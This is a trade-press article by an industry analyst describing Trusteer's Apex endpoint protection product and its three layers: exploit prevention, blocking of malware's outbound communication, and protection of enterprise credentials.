Most forms of malware and advanced persistent threats enter the enterprise through vulnerable endpoints. A new solution from Trusteer uses innovative techniques to prevent exploits and malware from compromising the endpoints and extracting information.
Malware developers are getting more creative. They've learned how common tools are designed to combat them and they simply develop new ways to evade these tools. It's a constant game of cat and mouse.
For example, sandboxing is a common technique used to emulate code execution for a period of time to see what actions it takes. If no bad actions are detected after a period of time -- say 10 to 20 minutes -- then it is assumed that the code is benign and it is allowed to execute. Malware developers sidestep this detection technique by having their code sit dormant for days or even weeks before activating and wreaking havoc. Or perhaps the code will only activate on a mouse click, and since emulated environments like a sandbox don't have mouse clicks, the code doesn't execute until it's released into the computer's real environment.
[ IN PICTURES: The future of malware ]
By today's security standards, the notion of trying to detect malware based on file signatures or blacklisting seems quaint. But more than that, it's almost totally ineffective. Antivirus and anti-malware vendors have tried to keep pace with the cybercriminals by adding heuristics to their solutions. This is still ineffective against new zero-day malicious code and advanced persistent threats (APTs).
Security vendors have started to take radically new approaches to combating malware and APTs. They are making use of vast amounts of behavior data they collect from their own or other suppliers' intelligence feeds. Being able to observe software behavior and traits on millions of Internet-connected computers allows security vendors to develop profiles of good behavior and bad behavior. From this they can craft new solutions that prevent or shut down the bad behavior and allow only the good software to proceed.
Trusteer is one such security vendor that is taking the intelligence it has gathered from managing more than 30 million endpoints and applying it to toward new techniques to protecting enterprise endpoints. Trusteer has been known for many years in the financial services space. The company's Rapport solution is used by numerous banks and credit unions to prevent online bank fraud by protecting consumers' computers from takeover by malware. Now Trusteer has introduced its Apex solution for the enterprise.
Trusteer Apex is an automated solution that prevents exploits and prevents malware from compromising the endpoints and extracting information, basically preventing APT attacks. This is how APTs and targeted attacks start these days -- by compromising the user endpoint.
Apex delivers three layers of security: exploit prevention, data exfiltration prevention and credentials protection. Here's a quick look at how each layer works.
The technology for the exploit prevention layer is based on stateful application control. While monitoring and protecting its 30 million consumer endpoints over the years, Trusteer learned to observe precisely what goes on when applications download files to an endpoint's file system. Trusteer looks at the application's memory state and the properties that are running on the endpoint and can accurately determine why a file has downloaded.
Consider what happens when a browser is used to download a file from the Internet. This could be a legitimate download, such as a user intentionally updating his version of Adobe Reader, or it could be a malicious drive-by download that the user didn't request. If you just look at the browser activity, it's very hard to determine if the download is legitimate or not, but by looking at the memory state and the properties that are running on the machine at the time this download is taking place, Trusteer can accurately say why the file is downloading. This technology protects applications that are often exploited, such as browsers, Adobe Reader and Java. Trusteer Apex looks for abnormal application states for downloading a file, and when it sees such an occurrence, the file is quarantined and prevented from executing.
The advantage of this approach is that it doesn't matter where the attack is coming from, or what kind of malware is trying to download, or what vulnerability it is trying to exploit. The malware can be known or unknown. Because the code violates the normal operation of the application, it gets stopped cold. This approach can stop zero-day exploits, exploitations of known application vulnerabilities, and any type of silent download of malware to the user's endpoint.
But exploits and silent downloads aren't the only way that malware gets onto a PC. An infected thumb drive can deliver malware, or malicious code could be embedded in a legitimate application. Therefore the second layer of Apex protection, data exfiltration prevention, is there to prevent unauthorized external communication. The first thing that advanced malware does today after it infects the endpoint is register with the command-and-control center where it gets instructions on what to do next. Eventually the malware will steal information and send it out to the attacker. So this external communication is key for compromising the endpoint.
Trusteer Apex is able to recognize all forms of direct and indirect external communication used by malicious processes and blocks this communication from happening. When the malware can't phone home and get instructions on what to do, it can't send data out of the network into the waiting arms of the attacker.
The third layer of protection Trusteer Apex provides is credentials protection. Organizations are generally concerned about legitimate enterprise credentials being harvested in phishing attacks, or being reused on public websites such as Facebook, LinkedIn, eBay and so on. Apex credential protection includes an anti-keylogger that encrypts passwords so they can't be used if harvested. The solution also prevents users from reusing enterprise passwords on non-enterprise websites. Apex basically keeps a list of approved enterprise applications where the user is allowed to use his corporate credentials. If the user goes to, say, Facebook and tries to use the same credentials, he'll be blocked from doing so.
Trusteer Apex is available today for Windows PCs and will be available soon for Mac PCs. Mobile devices are on Trusteer's roadmap. Trusteer Apex can be deployed onto managed or unmanaged endpoints that are accessing enterprise resources or web applications to ensure that no compromised endpoint is putting the enterprise at risk.
Linda Musthaler is a principal analyst with Essential Solutions Corporation. You can write to her at LMusthaler@essential-iws.com.
About Essential Solutions Corp:
Essential Solutions researches the practical value of information technology, and how it can make individual workers and entire organizations more productive. Essential Solutions offers consulting services to computer industry and corporate clients to help define and fulfill the potential of IT.